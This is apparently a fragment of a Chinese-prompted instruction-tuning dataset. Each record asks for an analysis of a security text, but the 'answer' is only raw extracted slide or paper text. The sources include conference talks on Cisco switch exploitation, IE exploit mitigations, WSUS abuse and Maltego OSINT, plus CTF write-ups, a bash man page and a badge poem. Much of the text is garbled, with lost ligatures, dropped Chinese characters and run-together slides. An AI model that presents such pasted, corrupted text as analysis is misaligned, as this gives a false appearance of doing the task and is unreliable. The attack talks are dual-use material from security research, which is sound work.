time=608.136 ms 64 bytes from 72.193.81.105: icmp_seq=16 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTTBSP Jon R. Kibler Mike Cooper textbook.security@gmail.com Hack the Textbook: The Textbook Security Project Hack the Textbook TTBSP Introduction  The Problem  Fixing It  The Project  How You Can Help!  Demo  Q&A Hack the Textbook TTBSP The Problem  Most security problems are caused by bad code  Bad code is caused by students not being taught how to write good code  Most programming textbooks have no security content  Many programming textbooks actually teach insecure programming practices and/or use vulnerable code in their examples  Instructors have to teach what is in the textbooks  Most programming instructors are not security experts  Instructors are evaluated on how closely they follow the textbooks in a course Hack the Textbook TTBSP Fixing It  Industry View  Students should be taught good software development practices in school  Tired of having to retrain new graduates  Academic View  Not a real issue  Publishers would be pressuring authors to change their textbooks if there was a real need  Students should be learning theory, not application  No resources  Not every instructor is a security expert  Not enough class time to add material to courses Hack the Textbook TTBSP The Project  The Textbook Security Project: TTBSP.ORG HackTheTextbook.org Hack the Textbook TTBSP The Project  Immediate Goals:  Publicly expose security flaws in popular textbooks  Encourage authors to use secure software development practices in their textbooks  Revise existing textbooks  Get it right the first time in new textbooks Hack the Textbook TTBSP The Project  Long Term Objectives  To make secure software development practices the standard way programming is taught  To make security an integral part of every computer science course  To become a resource that textbook authors and classroom instructors can use to stay up-to-date on the latest software security issues Hack the Textbook TTBSP How You Can Help!  Everyone:  Identify textbooks and courses using them  Review textbooks  E", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFinding useful and embarrassing information with Maltego ANDREW MACPHERSON ROELOF TEMMINGH 2017  WAVESTONE 2 Dealing the Perfect hand Shuffling memory blocks on z/OS CICSPwn: tool to pentest CICS middleware on a Mainframe (Remote code execution, access control bypass, etc.) ELV.APF : script for escalating privileges using APF libraries on z/OS (Mainframe) ELV.SVC : script for looking for  magic  syscalls and abusing them to achieve root (Mainframe) Ayoub ELAASSAL @ayoul3__ Github.com/ayoul3 Agenda u Intro u Footprinting - the good the bad and the machines u Section One: u Hunting ICS devices online in novel ways u Section Two: u Hunting interesting organisations with Databreaches from their networks u Section Three: u Identifying individuals at interesting locations u Questions! u Beer. Who am I? u Andrew MacPherson u @AndrewMohawk u 10 yrs at Paterva! u Andrew@Paterva.com u Employee number: 00000001 u Tech support -> Webdev -> Win (@Paterva) u B.Information Science degree (2006) u With friends like mine. #draco malfoy #worstfriends #shamecon u Something about someone with a Maltego hammer Who was RT? u Roelof Temmingh u roelof@paterva.com u (co)Founder SensePost (2000) u Testing pens for 7 years u Building tools, writing books, doing talks u Founder Paterva (2007) u Managing director u High level design u New features u 14 x BlackHat, 5 x Defcon. Bluehat, Ekoparty, Cansecwest, Ruxcon, etc. u DCC, UE, FIRST, GovCERT What is Maltego? u Tons of tutorials u Videos too! HERE BE DEMOS! u Demos rely on: u Internet connection u Code working u Remote APIs working u Nothing to have changed u Sacrifices have been made but if you could keep your fingers, toes and tongues crossed that would help! u Or you are just gonna get pictures and interpretive dance Foot printing 101 Domain' DNS'Name' MX' Website' NS' IP'Address' Netblock' AS'Number' Sharing'MX' 9'methods'for'finding' DNS'names' Sharing'NS' TLD'expand' Mirror' Resolve'IP' Reverse'DNS' Historic'DNS' DNS'Name'' to'Domain' Bl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Steganography 1 (Stegano, 100p) Find image files in the file ![](MrFusion.gpjb) Please input flag like this format-->SECCON{*** ** **** ****} ###PL [ENG](#eng-version) Dostajemy plik o rozszerzeniu .gpjb. Polecenie `file` rozpoznaje go jako gif: ![](out.0.gif) Ale po otworzeniu tego pliku w hexedytorze okazuje się że plik ten składa się w rzeczywistości z dużej liczby obrazów sklejonych w jeden. Domyślamy się że \"gpjb\" pochodzi od rozszerzeń .gif, .png, .jpg oraz .bmp. Piszemy na szybko skrypt w pythonie który dzieli te pliki na fragmenty (szukając odpowiednich headerów formatów): ```python import re data = open('MrFusion.gpjb', 'rb').read() def findndx(str, data): return [m.start() for m in re.finditer(str, data)] ext = { '.gif': 'GIF89a', '.png': '\\x89PNG', '.bmp': 'BM', '.jpg': '\\xFF\\xD8\\xFF\\xE0' } for ext, pat in ext.iteritems(): for n in findndx(pat, data): open('out.' + str(n) + ext, 'wb').write(data[n:]) ``` Następnie uruchamiamy go i otrzymujemy sporo obrazów, z których każdy odpowiada jednemu znakowi: ![](folder.png) Po przepisaniu: SECCON{OCT2120150728} Z powodu błedu w zadaniu flaga nie przechodziła sprawdzenia, więc do opisu zadania doszła informacja o wymaganym formacie flagi, więc ostateczna flaga: SECCON{OCT 21 2015 0728} ### ENG version We are given a file with .gpjb extension. `File` command recognises it as a gif: ![](out.0.gif) But after checking the file in hexeditor it turns out that the file is composed of large number of concantenated images. We guess that \"gpjb\" extension stands for gif, png, jpg and bmp file formats. We have written quick and dirty script to split file into fragments (according to format headers): ```python import re data = open('MrFusion.gpjb', 'rb').read() def findndx(str, data): return [m.start() for m in re.finditer(str, data)] ext = { '.gif': 'GIF89a', '.png': '\\x89PNG', '.bmp': 'BM', '.jpg': '\\xFF\\xD8\\xFF\\xE0' } for ext, pat in ext.iteritems(): for n in findndx(pat, data): open('out.' + str(n) + ext, 'wb').write(dat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNew Exploit Mi-ga-on In Internet Explorer HITCON X @K33nTeam @KeenTeam @promised_lu About Me Amateur browser exploiter Main work is wri-ng fuzzers 2 3 Background Internet Explorer Vulnerability Sta-s-cs 4 2013  CVE-2013-0025 CParaElement Use-ARer-Free  CVE-2013-1311 CDOMTextNode Use-ARer-Free  CVE-2013-1347 CGenericElement Use-ARer-Free  CVE-2013-2551 COALineDashStyleArray Integer Overflow Pwn2Own  CVE-2013-3184 CFlatMarkupPointer Use-ARer-Free  CVE-2013-3205 CCaret Use-ARer-Free  CVE-2013-3893 CTreeNode Use-ARer-Free  CVE-2013-3897 CDisplayPointer Use-ARer-Free 5 2013  129 CVE  Most are Use-ARer-Free 6 2014  CVE-2014-0322 CMarkup Use-ARer-Free  CVE-2014-1776 CMarkup Use-ARer-Free 7 2014  135 CVE from January to July  More than 2013 8 Exploit Mi-ga-on  Virtual Table Guard is introduced in Internet Explorer 10  An--Use-ARer-Free 9 Virtual Table Guard 10 New Exploit Mi-ga-on  Isolated Heap is introduced in MS14-035  Memory Protector is introduced in MS14-037  Internet Explorer 6~11  An--Use-ARer-Free 11 Agenda  Isolated Heap  Memory Protector  Fuzzing Issues  Countermeasures 12 13 Isolated Heap g_hIsolatedHeap g_hIsolatedHeap = HeapCreate(0, 0, 0); if (g_hIsolatedHeap) { ULONG HeapInformation = 2; // Enable LFH HeapSetInformation(g_hIsolatedHeap, 0, &HeapInformation, sizeof(HeapInformation)); } 14 _MemIsolatedAlloc LPVOID __stdcall _MemIsolatedAlloc(SIZE_T dwBytes) { if (!dwBytes) dwBytes = 1; return HeapAlloc(g_hIsolatedHeap, 0, dwBytes); } 15 _MemIsolatedAllocClear LPVOID __stdcall _MemIsolatedAllocClear(SIZE_T dwBytes) { return HeapAlloc(g_hIsolatedHeap, 8, dwBytes); } 16 _MemIsolatedFree void __stdcall _MemIsolatedFree(LPVOID lpMem) { if (lpMem) MemoryProtection::HeapFree(g_hIsolatedHeap, 0, lpMem); } 17 Internet Explorer 6 18 Internet Explorer 6 19 Isolated Objects  All DOM Objects  Some Render Objects 20 How To Fill Isolated Objects In Use-ARer-Free  BSTR  String  Struct  Isolated Object 21 22 Memory Protector ULONG_PTR m_Block; // address of heap block SIZE_T m_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" .\\\" MAN PAGE COMMENTS to .\\\" .\\\" Chet Ramey .\\\" Information Network Services .\\\" Case Western Reserve University .\\\" chet@ins.CWRU.Edu .\\\" .\\\" Last Change: Mon Jul 15 15:20:56 EDT 2002 .\\\" .\\\" bash_builtins, strip all but Built-Ins section .if \\n(zZ=1 .ig zZ .if \\n(zY=1 .ig zY .TH BASH 1 \"2002 July 15\" \"GNU Bash-2.05b\" .\\\" .\\\" There's some problem with having a `@' .\\\" in a tagged paragraph with the BSD man macros. .\\\" It has to do with `@' appearing in the }1 macro. .\\\" This is a problem on 4.3 BSD and Ultrix, but Sun .\\\" appears to have fixed it. .\\\" If you're seeing the characters .\\\" `@u-3p' appearing before the lines reading .\\\" `possible-hostname-completions .\\\" and `complete-hostname' down in READLINE, .\\\" then uncomment this redefinition. .\\\" .de }1 .ds ]X \\&\\\\*(]B\\\\ .nr )E 0 .if !\"\\\\$1\"\" .nr )I \\\\$1n .}f .ll \\\\n(LLu .in \\\\n()Ru+\\\\n(INu+\\\\n()Iu .ti \\\\n(INu .ie !\\\\n()Iu+\\\\n()Ru-\\w\\\\*(]Xu-3p \\{\\\\*(]X .br\\} .el \\\\*(]X\\h|\\\\n()Iu+\\\\n()Ru\\c .}f .. .\\\" .\\\" File Name macro. This used to be `.PN', for Path Name, .\\\" but Sun doesn't seem to like that very much. .\\\" .de FN \\fI\\|\\\\$1\\|\\fP .. .SH NAME bash \\- GNU Bourne-Again SHell (GNU 命令解释程序 \\(lqBourne二世\\(rq) .SH \"概述(SYNOPSIS)\" .B bash [options] [file] .SH \"版权所有(COPYRIGHT)\" .if n Bash is Copyright (C) 1989-2002 by the Free Software Foundation, Inc. .if t Bash is Copyright \\(co 1989-2002 by the Free Software Foundation, Inc. .SH \"描述(DESCRIPTION)\" .B Bash 是一个与 \\fIsh\\fP 兼容的命令解释程序可以执行从标准输入或者文件中读取的命令 .B Bash 也整合了 \\fIKorn\\fP 和 \\fIC\\fP \\fIShell\\fP (\\fBksh\\fP 和 \\fBcsh\\fP) 中的优秀特性 .PP .B Bash 的目标是成为遵循 IEEE POSIX Shell and Tools specification (IEEE Working Group 1003\\.2可移植操作系统规约 shell 和工具) 的实现 .SH \"选项(OPTIONS)\" 除了在 \\fBset\\fR 内建命令的文档中讲述的单字符选项 (option) 之外\\fBbash\\fR 在启动时还解释下列选项 .PP .PD 0 .TP 10 .BI \\-c \"\\| string\\\" 如果有 .B \\-c 选项那么命令将从 .IR string 中读取如果 .IR string 后面有参数 (argument)它们将用于给位置参数 (positional parameter以 .BR $0 起始) 赋值 .TP .B \\-i 如果有 .B \\-i 选项shell 将交互地执行 ( .IR interactive ) .TP .B \\-l 选项使得 .B bash 以类似登录 shell (login shell", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOde to the DEFCON 15 Badge Joe Grand (Kingpin) 170 hours of total time spent 2 nights of my honeymoon (oh, how I lament!) 3 circuit board revisions to get it all right 863,600 total components bring them to light 6,800 hackers wearing the badge in all its glory If you want to learn more, please read this fine story A matrix of 95 LEDs (5 columns by 19 row) Two coin cell batteries make the current flow Six text cutouts and soldermask colors to show If you're a human, speaker, goon, vendor, press, or uber bro On power up the badge will not make a peep But fear not, that's by design, it is only asleep Touch the top icon (it's a button, really) And get a scrolling text message intended for thee Touch the top icon yet again (just trust me) And you'll move to the next mode for custom text message entry Hit the bottom icon to begin your noble quest Then use either icon to cycle through the list Tap both icons to save a character to your queue 16 letters long is the maximum we can do When you're all done, seek out the solid block Tap both icons again and on the screen your message will walk The next mode sets the speed of your inscription You can change it like a baud rate or a doctor's drug prescription Select the scroll velocity between the numbers 1 and 5 Which goes from slow and boring to a thrilling autobahn drive (Remember to tap both icons for the badge to come alive) Next we arrive at our last badge state (finally) A special treat known as persistence-of-vision or POV Wave the badge in front of your eyes in one direction And a secret message appears magically like the morning's first erection If all you see is a jumbled mess of bright lights Try hiding in the darkness, squinting your eyes, or changing those hard-coded bytes (When your badge is not in use, set the mode back to snooze) The source code is open and the schematics are free (as in beer) So now you can be a hardware hacking engineer Unpopulated footprints for a wireless transceiver and accelerometer If you", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefending Networks with Incomplete Information: A Machine Learning Approach DefCon 21  2013 Page 1 Defending Networks with Incomplete Information: A Machine Learning Approach Introduction and Abstract Let's face it: we may win some battles, but we are losing the war pretty badly. Regardless of the advances in malware and targeted attacks detection technologies, our top security practitioners can only do so much in a 24 hour day. Even less, if you consider they need to eat and sleep. On the other hand, there is a severe shortage of capable people to do \"simple\" security monitoring effectively, let alone complex incident detection and response. Enter the use of Machine Learning as a way to automatically prioritize and classify potential events and attacks as something can could potentially be blocked automatically, is clearly benign, or is really worth the time of your analyst. In this Whitepaper we will present publicly for the first time an actual implementation of those concepts, in the form of a free-to-use web service. It leverages OSINT sources and knowledge about the spatial distribution of the Internet to generate a fluid and constantly updated classifier that pinpoints areas of interest on submitted network traffic and security tool log sources. Whitepaper Topics: Introduction and Abstract .................................................................................................................. 1 Security Monitoring: We are doing it wrong............................................................................. 2 Machine Learning and the Robot Uprising ................................................................................ 2 More attacks = more data = better defenses ............................................................................. 5 Designing a model to detect external agents with malicious behavior ........................ 6 Data Collection ......................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCisco Catalyst Exploitation Artem Kondratenko @artkond Whoami -Penetration tester @ Kaspersky Lab -Hacker -OSC(P|E) -Skydiver ;) Long story short  On March 26th 2017 Cisco announces that numerous models of switches are vulnerable to unauthenticated remote code execution vulnerability  No signs of exploitation in the wild  No exploit available Cisco advisory Cisco advisory Vendor advice: Disable telnet Disable telnet folks  Telnet is an old legacy protocol Disable telnet folks  Telnet is an old legacy protocol  SSH has been around for decades  a secure replacement for telnet Disable telnet folks  Telnet is an old legacy protocol  SSH has been around for decades  a secure replacement for telnet  Even more: according to the advisory, using telnet on a catalyst switch might be simple way for the attacker fully compromise the switch Still not convinced  No public exploit  No knowledge of in-the-wild exploitation  Critical-shmitical, should we even care? Public sources for researching the vulnerability  Cisco advisory  Vault 7 leak Vault 7: Hacking Tools Revealed Hacking techniques and potential exploit descriptions for multiple vendors. This was the source Cisco Systems used for their research on the advisory released on March 26th Cisco switch exploit Codename: ROCEM Cisco switch exploit Codename: ROCEM Cisco switch exploit Codename: ROCEM Rocem: Modes of Interaction  Set  Run exploit to set credless authentication  Unset  Run exploit to set credentials back in place  Interactive Mode  Exploit the system and present the attacker with shell immediately Easy enough. The perfect plan  Take two switches  Cluster dem switches!  Look for a magic whatever there is in the traffic  ???  Profit!!! Clustering Cisco switches Controlling Slave-switches from Master $ telnet 192.168.88.10 catalyst1#rcommand 1 catalyst2#show priv Current privilege level is 15 Clustering Catalyst switches Telnet? Clustering Cisco switches: L2 telnet Magic telnet option Telnet Debug log from Vault ROCEM ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOne-Man Shop How to build a functional security program with limited resources DEF CON 22 One-Man Shop  Agenda  Caveats & Considerations  People and Processes  Network Architecture  System Design  Continuous Monitoring  External Validation  Compliance Security Program Hierarchy of Needs Compliance External Validation Continuous Monitoring Secure System Design Secure Network Architecture People and Processes Caveats and Considerations  This is going to take Organizational Support  Security still answers to The Business  Security cannot mature past the Organization  Be realistic. The sky isnt falling.  Schedule time to stop firefighting  Just do the right thing Security Program Hierarchy of Needs Compliance External Validation Continuous Monitoring Secure System Design Secure Network Architecture People and Processes People and Processes  People  within the organization  Identify who they are and what roles they play  Negotiate sole ownership of systems and processes  even better - RACI Matrix  Most people take accountability seriously  Set and communicate expectations  The Business  owns the data  owns compliance  will get the fines and have charges pressed People and Processes  People  within IT  Recruit help. Make them aware of your plans  A good sysadmin or network person will make a good security liason. That may be you. People and Processes  \"Security needs to be embedded.\"  \"Security is (part of) a process\"  Consistency through Automation...  and Security through Consistency  Here's where your help comes in... People and Processes  Identify and document processes  As simple as a check list  \"Swim lanes\" flow chart to show handoffs  Identify where security can fit in best  Doesn't necessarily require security staff review  Can be a checklist or guideline for department  Examples:  Purchasing Standardized Equipment  Server and Workstation Management  Inventory People and Processes  Speaking of Inventory: KNOW YOUR ENVIRONMENT  Identify devices on your network and", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Secret Service * Category: Cryptography * 1500 Points * Solved by the JCTF Team ## Description > Hello there, > > In order for us to trust you, you must prove the you either have access to our RSA keys or already have the encrypted command: \"FLAGPLX\" (flag please thanks, in short). > > Come back to us when you have the flag so we know who we're talking to. > > http://secretservice.challenges.bsidestlv.com/index.php ## Solution We enter the website and see two APIs: 1. Execute an encrypted command and view the result 2. \"Create Demo Commands\" - view the encrypted value for a list of several example commands The demo commands included the following options: * Number 2 * Number 3 * Number 4 * Number 5 * Number 6 * Number 7 * Number 8 * Number 9 * cat hi.txt * cat bye.txt * CANIHAZSOME? Selecting a demo command returned the encrypted version of it, encoded in Base 64: ```console root@kali:/media/sf_CTFs/bsidestlv/Secret_Service# curl \"http://secretservice.challenges.bsidestlv.com/index.php?action=demo&value=2\" && echo \"\" NDQ5NTAyMTI4NDQ0NTY2OTAyMjQ4NDA5NjczNjQ5MjY5ODAzNjEyOTkxMTU0NzQ3NDE5NzYxMzI0MjcyOTE1MDM3NjQ1NTUxMTAwNTc= root@kali:/media/sf_CTFs/bsidestlv/Secret_Service# curl \"http://secretservice.challenges.bsidestlv.com/index.php?action=demo&value=cat%20hi.txt\" && echo \"\" MTc3MzA0MDM4NDk0OTExNzQyODYyOTM3ODIxMDk5MTAwNDU2NjgyNTAxMDY2NjYyODcxNjQzMjQ5MTkxNDI3MDg2MDY3MTQwMjk1ODM= ``` We could later send this to the \"execute\" API, and see the return value: ```console root@kali:/media/sf_CTFs/bsidestlv/Secret_Service# curl \"http://secretservice.challenges.bsidestlv.com/index.php?action=execute&value=NDQ5NTAyMTI4NDQ0NTY2OTAyMjQ4NDA5NjczNjQ5MjY5ODAzNjEyOTkxMTU0NzQ3NDE5NzYxMzI0MjcyOTE1MDM3NjQ1NTUxMTAwNTc=\" && echo \"\" 2 root@kali:/media/sf_CTFs/bsidestlv/Secret_Service# curl \"http://secretservice.challenges.bsidestlv.com/index.php?action=execute&value=MTc3MzA0MDM4NDk0OTExNzQyODYyOTM3ODIxMDk5MTAwNDU2NjgyNTAxMDY2NjYyODcxNjQzMjQ5MTkxNDI3MDg2MDY3MTQwMjk1ODM=\" && echo \"\" cat hi.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nURI相关 0x00 前 最近看了些关于url的技巧感觉对url的相关基础其实搞不太清楚所以脆从头仔细再学遍 主要参考些链接 https://datatracker.ietf.org/doc/html/rfc3986#section-1.1 https://docs.oracle.com/javase/8/docs/api/java/net/URI.html https://blog.csdn.net/anguowei/article/details/118381316 0x01 什么是uriurlurn uri(uniform resource identifier)统资源标识符于标识络上任意资源 urluniform resource locator统资源定位符通常表示资源的位置获取式等 urnuniform resource name统资源名称表示络上唯存在的资源名称即使资源不存在了们也可以继续使名称讨论他 其三者的关系如下图 很显然urn和url只是uri的两个集uri也还会包含其他的些分类不过那些分类很众基本不到也就是说部分时候我们看到的就 是url和urn最最常的如址等就是url我们在磁链接中则会看到urn的身影 再通俗点说urn就像个资源的名字如部蜘蛛侠电影我们在现实社会中会叫这部电影蜘蛛侠当我们说这个名字的时候别也 会知道说的是这部电影在络世界中针对某个唯的资源如蜘蛛侠电影的名字串urn来唯标识这样论在哪个站当我们 提到这个urn的时候该站通过解析就能知道我们说的是蜘蛛侠电影 那么url是什么呢如我们去A站和B站分别搜索蜘蛛侠电影他们会各返回各站上的蜘蛛侠电影播放链接这两个链接肯定是不相 同的因为他们分别指向A站和B站服务器上的某个蜘蛛侠电影的资源副本并且告诉户如何去访问什么参数在那个录下 等很显然url就是指代具体资源的位置访问法等同个urn可能对应络上N个url因为蜘蛛侠电影的副本资源在各站上 都有 0x02 格式 前说了主要的uri分为urn和url两类给出些例 ftp://ftp.is.co.za/rfc/rfc1808.txt http://www.ietf.org/rfc/rfc2396.txt ldap://[2001:db8::7]/c=GB?objectClass?one mailto:John.Doe@example.com news:comp.infosystems.www.servers.unix tel:+1-816-555-1212 telnet://192.0.2.16:80/ urn:oasis:names:specification:docbook:dtd:xml:4.1.2 其具体格式如下 上图是rfc中的解释不过他的图显示有问题所以可以看下这个 foo://example.com:8042/over/there?name=ferret#nose \\_/ \\______________/\\_________/ \\_________/ \\__/ | | | | | scheme authority path query fragment | _____________________|__ / \\ / \\ urn:example:animal:ferret:nose 相信很多同学多少有点基础所以上有些就不再说了看下authority authority = [ userinfo \"@\" ] host [ \":\" port ] authority由//标识开始并在下个/或者#或者或者末尾时结束 总之只要知道//开始的是authority的标识当然authority可以为空这样我们就可以很好理解file:///etc/passwd这种形式了也就是说 authority为空然后后跟上path因此会有三个/ 这最后再提个概念SchemeSpecificPart [scheme:]scheme-specific-part[#fragment] 0x03 不透明和分级uri uri也可以分为不透明的和分级的uri两类 如果个uri的scheme-spcific-part不以/开头则称他为不透明的通常这种uri的scheme-spcific-part部分不会再做进步的解析可能对 应的scheme有专属的解析器来解析但少不会按照通常那样来解析各个部分例如下 mailto:java-net@java.sun.com news:comp.lang.java urn:isbn:096139210x 分级URI就是我们经常的那种scheme后以/开头或者是没有scheme的相对uri都属于分级uri会按照前说的格式来尝试解释各个部 分例如下: http://java.sun.com/j2se/1.3/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLives on the Line Securing Crisis Maps in Libya, Sudan, and Pakistan DEFCON 19 - 2011 george chamales - rogue genius llc george chamales // DEFCON USA - 2011 The Humanitarian Technology Community needs your help. 2 george chamales // DEFCON USA - 2011 Crisis Aid Information Crisis Mapping Platform Reports Aid Aid 3 george chamales // DEFCON USA - 2011 Text http://news.bbc.co.uk/2/hi/8460574.stm Haiti 4 george chamales // DEFCON USA - 2011 Demande aide 4636 je suis perdu enbas une maison 2 etage no 147 av christophe chanel cafour I'm asking for help. I am lost beneath a house. Second Floor 147 Avenue Christophe Chanel Carrefour Mission 4636 5 george chamales // DEFCON USA - 2011 http://southallpakistanfloodsappeal.org/2010/08/24/urgent-appeal-for-pakistan-floods/ss-100730-pakistan-flood-05_ss_full/ Natural Disasters Dont Shoot Back 6 george chamales // DEFCON USA - 2011 http://southallpakistanfloodsappeal.org/2010/08/24/urgent-appeal-for-pakistan-floods/ss-100730-pakistan-flood-05_ss_full/ Pakistan 7 george chamales // DEFCON USA - 2011 8 george chamales // DEFCON USA - 2011 http://www.satsentinel.org/sites/default/files/SSP%2016%20Final%20Smaller.pdf Sudan 9 george chamales // DEFCON USA - 2011 Site Blocked by IP address Obviously Faked Reports Inadvertent Spam DOS 10 george chamales // DEFCON USA - 2011 Libya REUTERS http://warincontext.org/2011/03/08/the-fight-for-libya-6/ REUTERS 11 george chamales // DEFCON USA - 2011 Trusting Volunteer Analysts Protecting Observers Verifying Information 12 george chamales // DEFCON USA - 2011 January 2010 June 2011 Haiti Libya Syria Bahrain Egypt < 18 Months 13 george chamales // DEFCON USA - 2011 http://twitter.com/#!/JosetteSheeran/status/44358346014334976 14 george chamales // DEFCON USA - 2011 We gave Egyptian National Security a dedicated username and password [to access the Ushahidi platform] http://irevolution.net/2011/05/25/u-shahid-interviews/ 15 george chamales // DEFCON USA - 2011 Capability Attacks Security Ooh Shiny! Oh $#", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWSUSPENDU / 52 Yves Le Provost & Romain Coltel ANSSI WSUSpendu USE WSUS TO HANG ITS CLIENTS SATURDAY, 29TH JULY 2017 YVES LE PROVOST & ROMAIN COLTEL WSUSPENDU / 52 Yves Le Provost & Romain Coltel Who we are, what we do - Yves Le Provost - Security auditor for more than 10 years - Currently works for French cyber defense Agency (ANSSI) - Specializes in SCADA and database assessments, but masters any other field ;-) - Romain Coltel - Former security auditor - Currently works for a disruptive startup - Developing next-gen Active Directory security product 2 WSUSPENDU / 52 Yves Le Provost & Romain Coltel The problem Sometimes, compromising a network is not that easy. 3 WSUSPENDU / 52 Yves Le Provost & Romain Coltel Compromise scenario 4 You WSUSPENDU / 52 Yves Le Provost & Romain Coltel Compromise scenario 5 Internet-connected network Servers Workstations Domain controllers You WSUSPENDU / 52 Yves Le Provost & Romain Coltel Compromise scenario 6 Internet-connected network Servers Workstations Domain controllers You WSUSPENDU / 52 Yves Le Provost & Romain Coltel Compromise scenario 7 Internet-connected network Servers Workstations Domain controllers You WSUSPENDU / 52 Yves Le Provost & Romain Coltel Compromise scenario 8 Internet-connected network Disconnected network Physical boundary Servers Workstations Domain controllers You WSUSPENDU / 52 Yves Le Provost & Romain Coltel The solution? Sometimes, compromising a network might not be as far as we think. 9 WSUSPENDU / 52 Yves Le Provost & Romain Coltel Potential compromise scenario 10 Internet-connected network Disconnected network Physical boundary WSUS Server WSUS Server WSUSPENDU / 52 Yves Le Provost & Romain Coltel Potential compromise scenario 11 Internet-connected network Disconnected network Physical boundary WSUS Server WSUS Server ? ? ? WSUSPENDU / 52 Yves Le Provost & Romain Coltel Windows Server Update Services (WSUS) 12 Enterprise network HTTPS HTTP Microsoft Update www WSUS WSUSPENDU / 52 Yves Le Provost & R", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExamining the Internets Pollution! Karyn Benson! kbenson@cs.ucsd.edu! 2 https://www.reddit.com/r/AskReddit/comments/2pjsf9/garbage_men_of_reddit_whats_the_most_illegal/ 3 http://www.owensworld.com/funny-pictures/vehicles/2-cars-dumpster People throw out interesting and valuable items 4 This talk: what sort of interesting and valuable information can we find in the Internets trash? 5 About me  I studied Internet trash for the last 4 years of my PhD  Before grad school: wrote intrusion detection software 6 Outline  What is Internet trash?  How can we collect trash?  Data for this presentation  Interesting and valuable items found in trash  Conclusion 7 What is Internet trash?  Unsolicited packets  Passively captured  Also called Internet Background Radiation (IBR) 8 Traffic: Scanning  Searching for hosts that run a service 9  Host responds to forged packets 7.7.7.7 Traffic: Backscatter Victim Attacker 1.2.3.4 3.3.3.3 From: 1.2.3.4 To: 3.3.3.3 SYN 10  Host responds to forged packets 7.7.7.7 Traffic: Backscatter Victim Attacker 1.2.3.4 3.3.3.3 From: 3.3.3.3 To: 1.2.3.4 SYN-ACK 11 Traffic: Misconfiguration  Host erroneously believes that a machine is hosting a service DNS Servers: 5.5.5.5 6.6.6.6 1.2.3.4 X 12 Traffic: Bugs DNS Servers: 4.3.2.1 1.2.3.4  Software errors cause packets to reach unintended destinations To: 1.2.3.4 DNS Query 13 Traffic: Spoofed  Hosts forge their IP address to make it appear as though it originates from a different source 3.3.3.3 1.2.3.4 From: 2.2.2.2 To: 1.2.3.4 SYN 14 Traffic: Unknown  Traffic produced for an unknown purpose  TCP SYN to non-standard port  Encrypted UDP packets  UDP with unknown payload 6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19 0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71 0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ,.8.........q3.. 0x0020: 643e c2d4 2cf5 42b5 810f 7f01 5344 1e d>..,.B.....SD. 15 How can we collect trash? 16 How to collect unsolicited traffic  Honeypots: Setting up mac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNext Generation Data Forensics & Linux Thomas Rude, CISSP August 2002 Agenda Thomas Rude,  2002  Overview of Data Forensics  Agents of Change  Future of Data Forensics  Linux as Next Generation Data Forensics platform  Questions Data Forensics, Infancy Thomas Rude,  2002 Historically data forensics has focused on imaging and analyzing standalone personal computers (PCs). - small hard drives - DOS-based utilities Evolving Data Forensics Thomas Rude,  2002 First agents of change; - significantly larger hard drives (>500MB) - significant increase in number of PCs - increase in use of PCs in crimes Evolving Data Forensics Thomas Rude,  2002 Second agents of change; - significant increase in use of non-PC devices - servers, handhelds, digital cameras, etc. - increase in non-Windows operating systems - MacOS, UNIX flavors, Linux flavors, etc. Evolving Data Forensics Thomas Rude,  2002 Where does the data forensic community stand today? Electronic data is stored in many devices, ranging from wrist watches, telephony boxes, and enterprise servers. Increasingly forensic examiners are dealing with 'non-traditional' PCs, corporate security personnel are first responders to incidents, and critical data is residing in volatile system memory. NG Forensics Defined Thomas Rude,  2002 \"The scientific process of imaging and analyzing data stored in any electronic format, for the purpose of reporting findings in a neutral manner, with no predisposition as to guilt or innocence.\" farmerdude, 2002 NG Forensics & Linux Thomas Rude,  2002 Next generation data forensics platform of choice? Linux NG Forensics & Linux Thomas Rude,  2002 What makes Linux so powerful? - everything, including hardware, is a file - support for numerous file system types - ability to analyze a live system in a minimally invasive manner - ability to chain commands - ability to monitor and log processes & commands - ability to review source code - ability to create bootable media NG Forensics & Linux Thomas Rude,  ", "category": "text_analysis", "source": "security_papers"}
